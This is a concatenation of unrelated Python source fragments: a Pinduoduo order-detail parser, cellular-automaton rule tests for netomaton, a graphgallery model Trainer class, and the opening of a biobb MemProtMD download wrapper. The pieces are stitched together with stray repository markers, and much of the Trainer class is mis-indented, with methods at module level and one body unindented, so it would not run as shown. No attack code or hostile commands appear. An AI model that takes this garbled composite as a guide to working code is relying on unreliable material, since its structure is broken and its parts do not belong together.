        Each entry is a {"key": <label>, "value": <text>} dict; labels are
        matched by substring against the known Chinese field names.
        """
        if data is None:
            return
        for keyValue in data:
            key = keyValue.get("key")
            value = keyValue.get("value")
            if "订单编号" in key:
                self.order_id = value
            elif "支付方式" in key:
                self.pay_way = value
            elif "商品快照" in key:
                self.snapshot = value
            elif "下单时间" in key:
                self.buy_time_str = value
            elif "发货时间" in key:
                self.send_time_str = value
            elif "物流公司" in key:
                self.express = value
            elif "快递单号" in key:
                self.express_id = value

    def parse_goods(self, data):
        """Render each goods dict to a display string; join them into self.goods."""
        if data is None:
            return
        self.goods_list = []
        for goods in data:
            goods_name = self.get_not_none(goods, "goodsName")
            goods_price = self.get_not_none(goods, "goodsPrice", 0)
            goods_number = self.get_not_none(goods, "goodsNumber", 0)
            goods_url = self.get_not_none(goods, "linkUrl")
            self.goods_list.append(PingDuoDuoGood(goods_name, goods_number, goods_price, goods_url).to_string())
        self.goods = "\n".join(self.goods_list)

    def parse_mall(self, data):
        """Fill the mall id/name/url fields from a mall dict."""
        if data is None:
            return
        self.mall_id = self.get_not_none(data, "id", 0)
        self.mall_name = self.get_not_none(data, "mallName")
        self.mall_url = self.get_not_none(data, "mallUrl")

    def parse_receive_info(self, data):
        """Fill recipient name/phone and assemble the full shipping address
        as province + city + district + street + detail."""
        self.receive_name = self.get_not_none(data, "receiveName")
        self.mobile = self.get_not_none(data, "mobile")
        address = self.get_not_none(data, "address")
        district_name = self.get_not_none(data, "districtName")
        city_name = self.get_not_none(data, "cityName")
        shipping_address = self.get_not_none(data, "shippingAddress")
        province_name = self.get_not_none(data, "provinceName")
        self.address = province_name + city_name + district_name + shipping_address + address

    def parse(self, data):
        """Parse the full detail payload (recipient, description list, goods, mall)."""
        self.parse_receive_info(data)
        self.parse_order_list(data.get("orderDescList"))
        self.parse_goods(data.get("orderGoods"))
        self.parse_mall(data.get("mall"))
class Order:
    """Aggregate of a user's order summary and its detail record."""

    def __init__(self, _user_id, _order_info=None, _detail_info=None):
        # Bug fix: the defaults were previously `OrderInfo()` / `DetailInfo()`
        # instances created once at class-definition time and shared by every
        # call (mutable-default pitfall); build fresh objects per call instead.
        self.user_id = _user_id
        self.order_info = _order_info if _order_info is not None else OrderInfo()
        self.detail_info = _detail_info if _detail_info is not None else DetailInfo()
<gh_stars>10-100
from netomaton import topology, utils
import netomaton.rules as rules
from netomaton import NodeContext, evolve
from .rule_test import *
class TestRules(RuleTest):
    """Regression tests for the built-in netomaton activity rules.

    The ``*.ca`` fixtures contain the full expected evolution of each
    automaton; every test re-runs the automaton from the fixture's first
    row and compares the complete history against the stored matrix.
    """

    def test_majority_rule(self):
        # The majority value among the neighbourhood activities wins.
        actual = rules.majority_rule(NodeContext(0, 1, {}, [0, 1, 2, 3, 4], [1, 2, 1, 3, 4], [1., 1., 1., 1., 1.], 0, None, None))
        expected = 1
        self.assertEqual(expected, actual)
        actual = rules.majority_rule(NodeContext(0, 1, {}, [0, 1, 2, 3, 4], [2, 2, 2, 2, 2], [1., 1., 1., 1., 1.], 0, None, None))
        expected = 2
        self.assertEqual(expected, actual)
        # Single-neighbour degenerate case.
        actual = rules.majority_rule(NodeContext(0, 1, {}, [0], [3], [1.], 0, None, None))
        expected = 3
        self.assertEqual(expected, actual)
        # Float activities are supported as well.
        actual = rules.majority_rule(NodeContext(0, 1, {}, [0, 1, 2], [0., 0., 5423.], [1., 1., 1.], 0, None, None))
        expected = 0.
        self.assertEqual(expected, actual)

    def test_rule0_simple_init(self):
        expected = self._convert_to_matrix("rule0_simple_init.ca")
        actual = self._evolve_nks_ca(expected, 0)
        np.testing.assert_equal(expected, actual)

    def test_rule0_random_init(self):
        expected = self._convert_to_matrix("rule0_random_init.ca")
        actual = self._evolve_nks_ca(expected, 0)
        np.testing.assert_equal(expected, actual)

    def test_nks_ca_rule30_simple_init(self):
        expected_activities = self._convert_to_matrix("rule30_simple_init.ca")
        actual_activities = self._evolve_nks_ca(expected_activities, 30)
        np.testing.assert_equal(expected_activities, actual_activities)

    def test_nks_ca_rule30_random_init(self):
        expected_activities = self._convert_to_matrix("rule30_random_init.ca")
        actual_activities = self._evolve_nks_ca(expected_activities, 30)
        np.testing.assert_equal(expected_activities, actual_activities)

    def test_rule126_simple_init(self):
        expected = self._convert_to_matrix("rule126_simple_init.ca")
        actual = self._evolve_nks_ca(expected, 126)
        np.testing.assert_equal(expected, actual)

    def test_rule126_random_init(self):
        expected = self._convert_to_matrix("rule126_random_init.ca")
        actual = self._evolve_nks_ca(expected, 126)
        np.testing.assert_equal(expected, actual)

    def test_rule225_simple_init(self):
        expected = self._convert_to_matrix("rule225_simple_init.ca")
        actual = self._evolve_nks_ca(expected, 225)
        np.testing.assert_equal(expected, actual)

    def test_rule225_random_init(self):
        expected = self._convert_to_matrix("rule225_random_init.ca")
        actual = self._evolve_nks_ca(expected, 225)
        np.testing.assert_equal(expected, actual)

    def test_rule255_simple_init(self):
        expected = self._convert_to_matrix("rule255_simple_init.ca")
        actual = self._evolve_nks_ca(expected, 255)
        np.testing.assert_equal(expected, actual)

    def test_rule255_random_init(self):
        expected = self._convert_to_matrix("rule255_random_init.ca")
        actual = self._evolve_nks_ca(expected, 255)
        np.testing.assert_equal(expected, actual)

    def test_totalistic_3color_rule777_simple_init(self):
        expected = self._convert_to_matrix("tot3_rule777_simple_init.ca")
        actual = self._evolve_totalistic_ca(expected, 3, 777)
        np.testing.assert_equal(expected, actual)

    def test_totalistic_3color_rule777_random_init(self):
        expected = self._convert_to_matrix("tot3_rule777_random_init.ca")
        actual = self._evolve_totalistic_ca(expected, 3, 777)
        np.testing.assert_equal(expected, actual)

    def test_totalistic_4color_rule107396_simple_init(self):
        expected = self._convert_to_matrix("tot4_rule107396_simple_init.ca")
        actual = self._evolve_totalistic_ca(expected, 4, 107396)
        np.testing.assert_equal(expected, actual)

    def test_totalistic_4color_rule107396_random_init(self):
        expected = self._convert_to_matrix("tot4_rule107396_random_init.ca")
        actual = self._evolve_totalistic_ca(expected, 4, 107396)
        np.testing.assert_equal(expected, actual)

    def test_shift_to_center(self):
        # shift_to_center rotates the activities so the focal node's value
        # ends up in the middle slot; indices wrap at the lattice boundary.
        activities = [1, 1, 0]
        node_indices = [0, 1, 199]
        node_index = 0
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([0, 1, 1], shifted)
        activities = [1, 1, 0]
        node_indices = [0, 1, 199]
        node_index = 1
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([1, 1, 0], shifted)
        activities = [1, 1, 0]
        node_indices = [0, 1, 199]
        node_index = 199
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([1, 0, 1], shifted)
        activities = [1, 2, 3, 4, 5]
        node_indices = [0, 1, 2, 198, 199]
        node_index = 0
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([4, 5, 1, 2, 3], shifted)
        activities = [1, 2, 3, 4, 5]
        node_indices = [0, 1, 2, 198, 199]
        node_index = 1
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([5, 1, 2, 3, 4], shifted)
        activities = [1, 2, 3, 4, 5]
        node_indices = [0, 1, 2, 198, 199]
        node_index = 2
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([1, 2, 3, 4, 5], shifted)
        activities = [1, 2, 3, 4, 5]
        node_indices = [0, 1, 2, 198, 199]
        node_index = 198
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([2, 3, 4, 5, 1], shifted)
        activities = [1, 2, 3, 4, 5]
        node_indices = [0, 1, 2, 198, 199]
        node_index = 199
        shifted = rules.shift_to_center(activities, node_indices, node_index)
        self.assertEqual([3, 4, 5, 1, 2], shifted)

    def test_ca_density_classification(self):
        expected = self._convert_to_matrix("ca_density_classification.ca")
        actual = self._evolve_binary_ca(expected, r=3, rule=6667021275756174439087127638698866559)
        np.testing.assert_equal(expected, actual)

    def test_tot_rule126_2d_n9_simple_init(self):
        expected = self._convert_to_matrix2d("tot_rule126_2d_n9_simple_init.ca")
        actual = self._evolve_totalistic_ca2d(expected, 126, 'Moore')
        np.testing.assert_equal(expected, actual)

    def test_tot_rule26_2d_n5_simple_init(self):
        expected = self._convert_to_matrix2d("tot_rule26_2d_n5_simple_init.ca")
        # NOTE(review): '<NAME>' is an anonymisation placeholder, presumably
        # the 'von Neumann' neighbourhood -- confirm against the fixture.
        actual = self._evolve_totalistic_ca2d(expected, 26, '<NAME>')
        np.testing.assert_equal(expected, actual)

    # --- helpers: re-run an automaton from the fixture's first row ---

    @staticmethod
    def _evolve_nks_ca(expected, rule):
        rows, size = expected.shape
        initial_conditions = np.array(expected[0]).flatten()
        network = topology.cellular_automaton(n=size, r=1)
        trajectory = evolve(initial_conditions=initial_conditions, network=network,
                            activity_rule=rules.nks_ca_rule(rule), timesteps=rows)
        return utils.get_activities_over_time_as_list(trajectory)

    @staticmethod
    def _evolve_binary_ca(expected, r, rule):
        rows, size = expected.shape
        initial_conditions = np.array(expected[0]).flatten()
        network = topology.cellular_automaton(n=size, r=r)
        trajectory = evolve(initial_conditions=initial_conditions, network=network,
                            activity_rule=rules.binary_ca_rule(rule), timesteps=rows)
        return utils.get_activities_over_time_as_list(trajectory)

    @staticmethod
    def _evolve_totalistic_ca(expected, k, rule):
        rows, size = expected.shape
        initial_conditions = np.array(expected[0]).flatten()
        network = topology.cellular_automaton(n=size, r=1)
        trajectory = evolve(initial_conditions=initial_conditions, network=network,
                            activity_rule=rules.totalistic_ca(k, rule), timesteps=rows)
        return utils.get_activities_over_time_as_list(trajectory)

    @staticmethod
    def _evolve_totalistic_ca2d(expected, rule, neighbourhood):
        steps, rows, size = expected.shape
        initial_conditions = np.array(expected[0]).reshape(rows * size).flatten()
        network = topology.cellular_automaton2d(rows=rows, cols=size, r=1, neighbourhood=neighbourhood)
        trajectory = evolve(initial_conditions=initial_conditions, network=network,
                            activity_rule=rules.totalistic_ca(k=2, rule=rule), timesteps=steps)
        activities = utils.get_activities_over_time_as_list(trajectory)
        return np.array(activities).reshape((steps, rows, size))
|
import os
import sys
import warnings
import importlib
import inspect
import os.path as osp
import numpy as np
import tensorflow as tf
from tensorflow.keras.utils import Sequence
from tensorflow.python.keras import callbacks as callbacks_module
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
from tensorflow.keras.callbacks import History
from torch.utils.data import DataLoader, Dataset
import graphgallery as gg
from graphgallery import functional as gf
from graphgallery.data.io import makedirs_from_filepath
from graphgallery.gallery import Model
from graphgallery.utils import Progbar
# TensorFlow 2.1.x
# Ignore warnings:
# UserWarning: Converting sparse IndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.
# This is caused by `tf.gather` and it will be solved in future tensorflow version.
warnings.filterwarnings(
    'ignore',
    message='.*Converting sparse IndexedSlices to a dense Tensor of unknown shape.*')

# TensorFlow 2.4.0
# Ignore warnings:
# UserWarning: Converting sparse IndexedSlices(IndexedSlices(indices=...) to a dense Tensor of unknown shape.
# This may consume a large amount of memory.
warnings.filterwarnings(
    'ignore', message='.*to a dense Tensor of unknown shape.*')
def format_doc(d):
    """Render an argument-name -> default-value mapping as a numbered listing."""
    lines = []
    for i, (k, v) in enumerate(d.items(), start=1):
        if v == "UNSPECIDIED":
            lines.append(f"({i}) `{k}`, UNSPECIDIED argument\n")
        else:
            lines.append(f"({i}) `{k}`, Default is `{v}` \n")
    return "".join(lines)
def doc_dict(func):
    """Return an {arg_name: default} mapping for func's positional args.

    A leading `self` parameter is skipped; args without a default get the
    "UNSPECIDIED" sentinel understood by `format_doc`.

    Bug fix: a callable with zero positional args previously raised
    IndexError on `args[0]`; it now yields an empty dict.
    """
    ArgSpec = inspect.getfullargspec(func)
    args = ArgSpec.args if ArgSpec.args else []
    if args and args[0] == "self":
        args = args[1:]
    defaults = ArgSpec.defaults if ArgSpec.defaults else []
    # Left-pad with the sentinel so defaults line up with the last args.
    delta_l = len(args) - len(defaults)
    defaults = ["UNSPECIDIED"] * delta_l + list(defaults)
    d = dict(zip(args, defaults))
    return d
def make_docs(*func):
    """Merge the argument docs of several callables into one formatted listing."""
    merged = {}
    for fn in func:
        merged.update(doc_dict(fn))
    return format_doc(merged)
def unravel_batch(batch):
    """Split a data-loader batch into (inputs, labels, out_index).

    A list/tuple batch is read positionally: inputs, labels, and (when
    longer than 2) the last element as out_index; anything else is treated
    as bare inputs. Single-element list/tuple labels and out_index are
    unwrapped. Robustness fix: batches of length 0 or 1 no longer raise
    IndexError -- missing slots come back as None.
    """
    inputs = labels = out_index = None
    if isinstance(batch, (list, tuple)):
        if len(batch) > 0:
            inputs = batch[0]
        if len(batch) > 1:
            labels = batch[1]
        if len(batch) > 2:
            out_index = batch[-1]
    else:
        inputs = batch
    if isinstance(labels, (list, tuple)) and len(labels) == 1:
        labels = labels[0]
    if isinstance(out_index, (list, tuple)) and len(out_index) == 1:
        out_index = out_index[0]
    return inputs, labels, out_index
class Trainer(Model):
def setup_cfg(self):
"""load the default config function `default_cfg_setup` for the corresponding task.
Raises
------
RuntimeError
the default config function `default_cfg_setup` not found in the file `graphgallery.gallery.[task].default`
"""
# nodeclas/linkpred/...
task_module = self.__module__.split('.')[2]
# graphgallery.gallery
gallery_module = '.'.join(__name__.split('.')[:-1])
try:
default_setup = importlib.import_module(f".{task_module}.default", gallery_module)
except ModuleNotFoundError:
raise RuntimeError(f"default setup function `{gallery_module}.{task_module}.default.default_cfg_setup` not found!")
default_setup.default_cfg_setup(self.cfg)
@np.deprecate(old_name="make_data",
message=("the method `trainer.make_data` is currently deprecated from 0.9.0,"
" please use `trainer.setup_graph` instead."))
def make_data(self, *args, **kwargs):
return self.setup_graph(*args, **kwargs)
    def setup_graph(self, graph, graph_transform=None, device=None, **kwargs):
        """This method is used for process your inputs, which accepts
        only keyword arguments in your defined method 'data_step'.
        This method will process the inputs, and transform them into tensors.
        Commonly used keyword arguments:
        --------------------------------
        graph: graphgallery graph classes.
        graph_transform: string, Callable function,
        or a tuple with function and dict arguments.
        transform for the entire graph, it is used first.
        device: device for preparing data, if None, it defaults to `self.device`
        adj_transform: string, Callable function,
        or a tuple with function and dict arguments.
        transform for adjacency matrix.
        attr_transform: string, Callable function,
        or a tuple with function and dict arguments.
        transform for attribute matrix.
        other arguments (if have) will be passed into method 'data_step'.

        Returns self to allow chaining (e.g. trainer.setup_graph(g).build()).
        """
        # Drop any tensors cached from a previous graph before rebuilding.
        self.empty_cache()
        model = self.model
        if model is not None and hasattr(model, 'empty_cache'):
            model.empty_cache()
        # Apply the whole-graph transform first, then remember the result.
        self.graph = gf.get(graph_transform)(graph)
        cfg = self.cfg.data
        if device is not None:
            self.data_device = gf.device(device, self.backend)
        else:
            self.data_device = self.device
        cfg.device = device
        # data_step consumes the remaining kwargs and returns the effective
        # (possibly defaulted) values, which are recorded in the config.
        _, kwargs = gf.wrapper(self.data_step)(**kwargs)
        kwargs['graph_transform'] = graph_transform
        cfg.merge_from_dict(kwargs)
        # Remember every '*transform' argument as a resolved callable.
        for k, v in kwargs.items():
            if k.endswith("transform"):
                setattr(self.transform, k, gf.get(v))
        return self
def data_step(self, *args, **kwargs):
"""Implement you data processing function here"""
raise NotImplementedError
def build(self, **kwargs):
    """This method is used to build your model, which
    accepts only keyword arguments in your defined method 'model_step'.

    Note:
    -----
    This method should be called after `process`.

    Commonly used keyword arguments:
    --------------------------------
    hids: int or a list of them,
        hidden units for each hidden layer.
    acts: string or a list of them,
        activation functions for each layer.
    dropout: float scalar,
        dropout used in the model.
    lr: float scalar,
        learning rate used for the model.
    weight_decay: float scalar,
        weight decay used for the model weights.
    bias: bool,
        whether to use bias in each layer.
    use_tfn: bool,
        this argument is only used for TensorFlow backend, if `True`, it will decorate
        the model training and testing with `tf.function` (See `graphgallery.nn.modes.TFKeras`).
        By default, it was `True`, which can accelerate the training and inference, by it may cause
        several errors.
    other arguments (if have) will be passed into your method 'model_step'.
    """
    if self._graph is None:
        raise RuntimeError("Please call 'trainer.setup_graph(graph)' first.")
    use_tfn = kwargs.get("use_tfn", True)
    if self.backend == "tensorflow":
        # TF path: build under a device scope and optionally wrap with tf.function.
        with tf.device(self.device):
            self.model, kwargs = gf.wrapper(self.model_step)(**kwargs)
            if use_tfn:
                self.model.use_tfn()
    else:
        # Torch-like path: `use_tfn` is TF-only, so strip it before model_step.
        kwargs.pop("use_tfn", None)
        model, kwargs = gf.wrapper(self.model_step)(**kwargs)
        self.model = model.to(self.device)
    self.cfg.model.merge_from_dict(kwargs)
    return self
def model_step(self, *args, **kwargs):
    """Implement your model building function here; called by `build`."""
    raise NotImplementedError
def fit(self, train_data, val_data=None, **kwargs):
    """Train the built model.

    Parameters
    ----------
    train_data: training inputs; wrapped via `self.train_loader` unless
        already a Sequence/DataLoader/Dataset.
    val_data: optional validation inputs; wrapped via `self.test_loader`.
    **kwargs: merged into `self.cfg.fit` (epochs, verbose, callback configs...).

    Returns
    -------
    History: per-epoch training logs.
    """
    cache = self.cache
    cfg = self.cfg.fit
    cfg.merge_from_dict(kwargs)
    ckpt_cfg = cfg.ModelCheckpoint
    es_cfg = cfg.EarlyStopping
    pb_cfg = cfg.Progbar
    log_cfg = cfg.Logger
    if log_cfg.enabled:
        log_cfg.name = log_cfg.name or self.name
        logger = gg.utils.setup_logger(output=log_cfg.filepath, name=log_cfg.name)
    model = self.model
    if model is None:
        raise RuntimeError(
            'You must compile your model before training/testing/predicting. Use `trainer.build()`.'
        )
    # Wrap raw inputs into a loader unless they are already batched containers.
    if not isinstance(train_data, (Sequence, DataLoader, Dataset)):
        train_data = self.train_loader(train_data)
    if cfg.cache_train_data:
        cache.train_data = train_data
    validation = val_data is not None
    if validation:
        if not isinstance(val_data, (Sequence, DataLoader, Dataset)):
            val_data = self.test_loader(val_data)
        if cfg.cache_val_data:
            cache.val_data = val_data
    # Setup callbacks
    callbacks = callbacks_module.CallbackList()
    history = History()
    callbacks.append(history)
    cfg, callbacks = setup_callbacks(cfg, callbacks, validation)
    callbacks.set_model(model)
    self.callbacks = callbacks
    model.stop_training = False
    verbose = cfg.verbose
    assert not (verbose and log_cfg.enabled), "Progbar and Logger cannot be used together! You must set `verbose=0` when Logger is enabled."
    if verbose:
        # verbose 1/2: one progbar over all epochs; verbose > 2: a fresh
        # per-epoch progbar is created inside the loop below.
        if verbose <= 2:
            progbar = Progbar(target=cfg.epochs,
                              width=pb_cfg.width,
                              verbose=verbose)
        print("Training...")
    elif log_cfg.enabled:
        logger.info("Training...")
    logs = gf.BunchDict()
    callbacks.on_train_begin()
    # for some initialization
    if hasattr(model, 'on_train_begin'):
        model.on_train_begin()
    try:
        for epoch in range(cfg.epochs):
            if verbose > 2:
                progbar = Progbar(target=len(train_data),
                                  width=pb_cfg.width,
                                  verbose=verbose - 2)
            callbacks.on_epoch_begin(epoch)
            train_logs = self.train_step(train_data)
            if hasattr(train_data, 'on_epoch_end'):
                train_data.on_epoch_end()
            logs.update({k: to_item(v) for k, v in train_logs.items()})
            if validation:
                valid_logs = self.test_step(val_data)
                # Validation metrics are namespaced with the "val_" prefix.
                logs.update({("val_" + k): to_item(v) for k, v in valid_logs.items()})
                if hasattr(val_data, 'on_epoch_end'):
                    val_data.on_epoch_end()
            callbacks.on_train_batch_end(len(train_data), logs)
            callbacks.on_epoch_end(epoch, logs)
            if verbose > 2:
                print(f"Epoch {epoch+1}/{cfg.epochs}")
                progbar.update(len(train_data), logs.items())
            elif verbose:
                progbar.update(epoch + 1, logs.items())
            elif log_cfg.enabled:
                logger.info(f"Epoch {epoch+1}/{cfg.epochs}\n{gg.utils.create_table(logs)}")
            if model.stop_training:
                # Set by EarlyStopping (or any custom callback).
                if log_cfg.enabled:
                    logger.info(f"Early Stopping at Epoch {epoch}")
                else:
                    print(f"Early Stopping at Epoch {epoch}", file=sys.stderr)
                break
        callbacks.on_train_end()
        # Restore the best checkpoint recorded during training.
        if ckpt_cfg.enabled:
            if ckpt_cfg.save_weights_only:
                model.load_weights(ckpt_cfg.path)
            else:
                self.model = model.load(ckpt_cfg.path)
    finally:
        # to avoid unexpected termination of the model
        if ckpt_cfg.enabled and ckpt_cfg.remove_weights:
            self.remove_weights()
    return history
def evaluate(self, test_data, **kwargs):
    """Evaluate the trained model on `test_data`.

    Parameters
    ----------
    test_data: evaluation inputs; wrapped via `self.test_loader` unless
        already a Sequence/DataLoader/Dataset.
    **kwargs: merged into `self.cfg.evaluate`.

    Returns
    -------
    gf.BunchDict: metric name -> plain Python scalar.

    Raises
    ------
    RuntimeError: if the model has not been built yet.
    """
    if not self.model:
        raise RuntimeError(
            'You must compile your model before training/testing/predicting. Use `trainer.build()`.'
        )
    cache = self.cache
    cfg = self.cfg.evaluate
    cfg.merge_from_dict(kwargs)
    if not isinstance(test_data, (Sequence, DataLoader, Dataset)):
        test_data = self.test_loader(test_data)
    if cfg.cache_test_data:
        cache.test_data = test_data
    progbar = None
    if cfg.verbose:
        print("Testing...")
        progbar = Progbar(target=len(test_data),
                          width=cfg.Progbar.width,
                          verbose=cfg.verbose)
    logs = gf.BunchDict(**self.test_step(test_data))
    logs.update({k: to_item(v) for k, v in logs.items()})
    # BUG FIX: `progbar` used to be created only when cfg.verbose was truthy,
    # yet `progbar.update` ran unconditionally -> NameError with verbose=0.
    if progbar is not None:
        progbar.update(len(test_data), logs.items())
    return logs
def train_step(self, sequence):
    """Run a single training epoch over `sequence`, returning the logs of the
    final batch (metrics are reset once at the start of the epoch)."""
    model = self.model
    model.reset_metrics()
    results = None
    for step, batch in enumerate(sequence):
        self.callbacks.on_train_batch_begin(step)
        x, y, out_index = unravel_batch(batch)
        results = model.train_step_on_batch(x=x,
                                            y=y,
                                            out_index=out_index,
                                            device=self.device)
    return results
def test_step(self, sequence):
    """Run a single evaluation pass over `sequence`, returning the logs of the
    final batch (metrics are reset once up front)."""
    model = self.model
    model.reset_metrics()
    results = None
    for batch in sequence:
        x, y, out_index = unravel_batch(batch)
        results = model.test_step_on_batch(x=x,
                                           y=y,
                                           out_index=out_index,
                                           device=self.device)
    return results
def predict(self, predict_data=None, transform=None):
    """Predict on `predict_data` and return squeezed, post-processed logits.

    `transform` (string/callable/None) is resolved via `gf.get` and applied
    to the stacked logits; it is also remembered on `self.transform`.

    Raises:
        RuntimeError: if the model has not been built yet.
    """
    if not self.model:
        raise RuntimeError(
            'You must compile your model before training/testing/predicting. Use `trainer.build()`.'
        )
    cfg = self.cfg.predict
    cfg.transform = transform
    if not isinstance(predict_data, (Sequence, DataLoader, Dataset)):
        predict_data = self.predict_loader(predict_data)
    if cfg.cache_predict_data:
        self.cache.predict_data = predict_data
    raw_logits = self.predict_step(predict_data)
    post = gf.get(transform)
    self.transform.logit_transform = post
    return post(raw_logits).squeeze()
def predict_step(self, sequence):
    """Collect per-batch logits over `sequence` and stack them row-wise."""
    model = self.model
    outputs = []
    for batch in sequence:
        x, labels, out_index = unravel_batch(batch)
        outputs.append(model.predict_step_on_batch(x=x,
                                                   out_index=out_index,
                                                   device=self.device))
    return np.vstack(outputs)
def train_loader(self, inputs, **kwargs):
    """Build the training data loader; subclasses must override."""
    raise NotImplementedError
def test_loader(self, inputs, **kwargs):
    """Build the evaluation loader; defaults to the training loader."""
    return self.train_loader(inputs, **kwargs)
def predict_loader(self, inputs, **kwargs):
    """Build the prediction loader; defaults to the evaluation loader."""
    return self.test_loader(inputs, **kwargs)
def _test_predict(self, index):
    """Quick accuracy check: argmax of predictions on `index` versus the
    stored node labels; returns the mean accuracy."""
    probabilities = self.predict(index)
    predicted = probabilities.argmax(1)
    expected = self.graph.node_label[index]
    return (predicted == expected).mean()
def reset_weights(self):
    # TODO: add pytorch support
    """reset the model to the first time.

    Restores every weight tensor from `self.backup` (TensorFlow only).

    Raises:
        RuntimeError: if no backup has been stored yet.
    """
    model = self.model
    if self.backup is None:
        raise RuntimeError(
            "You must store the `backup` before `reset_weights`."
            "`backup` will be automatically stored when the model is built."
        )
    # Pairwise in-place assignment of the saved tensors.
    for w, wb in zip(model.weights, self.backup):
        w.assign(wb)
@ property
def model(self):
    """The underlying model instance (None until `build()` is called)."""
    return self._model
@ model.setter
def model(self, m):
    """Set the underlying model instance (no validation is performed)."""
    # Back up
    # if isinstance(m, tf.keras.Model) and m.weights:
    #     self.backup = tf.identity_n(m.weights)
    # TODO assert m is None or isinstance(m, tf.keras.Model) or torch.nn.Module
    self._model = m
def reset_optimizer(self):
    """Zero all optimizer slot variables (TensorFlow only).

    Raises:
        RuntimeError: if the current model exposes no `optimizer` attribute.
    """
    # TODO: add pytorch support
    model = self.model
    if not hasattr(model, 'optimizer'):
        # Fixed error-message grammar ("has not attribute" -> "has no attribute").
        raise RuntimeError("The model has no attribute `optimizer`!")
    for var in model.optimizer.variables():
        var.assign(tf.zeros_like(var))
def reset_lr(self, value):
    """Set the optimizer learning rate to `value` (TensorFlow only).

    Raises:
        RuntimeError: if the current model exposes no `optimizer` attribute.
    """
    # TODO: add pytorch support
    model = self.model
    if not hasattr(model, 'optimizer'):
        # Fixed error-message grammar ("has not attribute" -> "has no attribute").
        raise RuntimeError("The model has no attribute `optimizer`!")
    model.optimizer.learning_rate.assign(value)
def remove_weights(self):
    """Delete the checkpoint written during `fit()` (plus the TF sidecar files)."""
    filepath = self.cfg.fit.ModelCheckpoint.path
    if self.backend == "tensorflow":
        # Non-h5 TF checkpoints leave extra .index/.data/checkpoint files behind.
        remove_extra_tf_files(filepath)
    if osp.exists(filepath):
        os.remove(filepath)
def help(self, return_msg=False):
    """return help message for the `trainer`

    If `return_msg` is True the message is returned instead of printed.
    """
    msg = f"""
**************************************Help Message for {self.name}******************************************
|First, setup a graph, run `trainer.setup_graph`, the reqiured argument are: |
{make_docs(self.setup_graph, self.data_step)}

|Second, build your model, run `trainer.build`, the reqiured argument are: |
{make_docs(self.build, self.model_step)}

|Third, train your model, run `trainer.fit`, the reqiured argument are: |
{make_docs(self.fit)}

|Finall and optionally, evaluate your model, run `trainer.evaluate`, the reqiured argument are: |
{make_docs(self.evaluate)}
"""
    if return_msg:
        return msg
    else:
        print(msg)
# def __getattr__(self, attr):
# ##### FIXME: This may cause ERROR ######
# try:
# return self.__dict__[attr]
# except KeyError:
# if hasattr(self, "_model") and hasattr(self._model, attr):
# return getattr(self._model, attr)
# raise AttributeError(
# f"'{self.name}' and '{self.name}.model' objects have no attribute '{attr}'"
# )
def to_item(value):
    """Convert a framework scalar (TF/torch tensor or numpy value) into a
    plain Python value; `None` and ordinary Python objects pass through."""
    if value is None:
        return None
    if hasattr(value, 'numpy'):
        # tensor -> ndarray / numpy scalar
        value = value.numpy()
    if hasattr(value, 'item'):
        # 0-d ndarray / numpy scalar -> builtin scalar
        value = value.item()
    return value
def remove_extra_tf_files(filepath):
    """Delete the sidecar files TensorFlow writes next to a checkpoint saved
    without the h5 format (.data-*, .index and the shared `checkpoint` file)."""
    for suffix in (".data-00000-of-00001", ".index"):
        candidate = filepath + suffix
        if osp.exists(candidate):
            os.remove(candidate)
    checkpoint = osp.join(osp.split(osp.realpath(filepath))[0], "checkpoint")
    if osp.exists(checkpoint):
        os.remove(checkpoint)
def setup_callbacks(cfg, callbacks, validation):
    """Populate `callbacks` with EarlyStopping/ModelCheckpoint/TensorBoard
    according to `cfg`; returns the (possibly mutated) cfg and callback list."""
    ckpt_cfg = cfg.ModelCheckpoint
    es_cfg = cfg.EarlyStopping
    tb_cfg = cfg.TensorBoard
    if not validation:
        # Without validation data, "val_*" monitors cannot be computed.
        # NOTE(review): these branches disable the callback AND strip the
        # "val_" prefix -- the stripped monitor is never used since the
        # callback stays disabled; confirm whether disabling was intended.
        if ckpt_cfg.enabled and ckpt_cfg.monitor.startswith("val_"):
            ckpt_cfg.enabled = False
            ckpt_cfg.monitor = ckpt_cfg.monitor[4:]
        if es_cfg.enabled and es_cfg.monitor.startswith("val_"):
            es_cfg.enabled = False
            es_cfg.monitor = es_cfg.monitor[4:]
    if es_cfg.enabled:
        es_callback = EarlyStopping(monitor=es_cfg.monitor,
                                    patience=es_cfg.patience,
                                    mode=es_cfg.mode,
                                    verbose=es_cfg.verbose,
                                    baseline=es_cfg.baseline,
                                    restore_best_weights=es_cfg.restore_best_weights)
        callbacks.append(es_callback)
    if ckpt_cfg.enabled:
        # Ensure the checkpoint path carries the backend's file extension.
        if not ckpt_cfg.path.endswith(gg.file_ext()):
            ckpt_cfg.path += gg.file_ext()
        makedirs_from_filepath(ckpt_cfg.path)
        mc_callback = ModelCheckpoint(ckpt_cfg.path,
                                      mode=ckpt_cfg.mode,
                                      monitor=ckpt_cfg.monitor,
                                      save_best_only=ckpt_cfg.save_best_only,
                                      save_weights_only=ckpt_cfg.save_weights_only,
                                      verbose=ckpt_cfg.verbose)
        callbacks.append(mc_callback)
    if tb_cfg.enabled:
        callbacks.append(tf.keras.callbacks.TensorBoard(tb_cfg.log_dir,
                                                        write_graph=tb_cfg.write_graph,
                                                        update_freq=tb_cfg.update_freq,
                                                        histogram_freq=tb_cfg.histogram_freq,
                                                        write_images=tb_cfg.write_images))
    return cfg, callbacks
|
#!/usr/bin/env python
"""Module containing the MemProtMDSim class and the command line interface."""
import argparse
from biobb_common.generic.biobb_object import BiobbObject
from biobb_common.configuration import settings
from biobb_common.tools import file_utils as fu
from biobb_common.tools.file_utils import launchlogger
from biobb_io.api.common import *
class MemProtMDSim(BiobbObject):
    """
    | biobb_io MemProtMDSim
    | This class is a wrapper of the MemProtMD to download a simulation using its REST API.
    | Wrapper for the `MemProtMD DB REST API <http://memprotmd.bioch.ox.ac.uk/>`_ to download a simulation.

    Args:
